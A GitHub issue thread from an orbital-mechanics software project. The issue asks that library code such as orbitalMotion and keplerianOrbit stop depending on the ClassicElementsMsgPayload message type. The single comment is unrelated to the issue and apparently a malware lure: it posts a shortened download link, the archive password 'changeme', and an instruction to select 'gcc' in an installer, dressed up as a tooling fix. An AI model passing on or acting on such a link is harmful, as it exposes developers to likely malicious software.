### ISSUE TITLE
Remove module dependency on ClassicElementsMsgPayload  

### ISSUE THREAD

**Issue by patkenneally** [lasp/xmera#308]
**Describe the bug**
This is a bug in so far as it violates component/system boundaries and introduces compile time and run time coupling (and a more confused analyst user python API)

The message `ClassicElementsMsgPayload` type is being used as a data type beyond simply message passing, resulting in coupling many compilation units/modules to the message definition. Many of the implicated modules/components never read or write the message. This results in coupling the library files `orbitalMotion`, `keplerianOrbit`, and many modules to the message type. 

Only simulation modules should have a coupling to a message type.  
The orbital motion library reasonably encapsulates the classical  
orbital elements types. Message payload types are defining data  
exchange types. Their definition can and should be able to vary  
according to messaging needs. Types that libs rely on should be  
changed and maintained to support those libs. Decoupling these  
means that if we change a msg type, then unrelated libraries do  
not break or require an update as well.

**To reproduce**
No reproduction steps necessary.

**Expected behavior**
Module and library dependencies should be localized to modules and libraries, Message types should only be used for messages.

**Screenshots**
NA

**Desktop (please complete the following information):**
- OS: All systems
- Version [e.g. 12.6.1]
- Python version [e.g. 3.9.15]

**Additional context**
NA

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
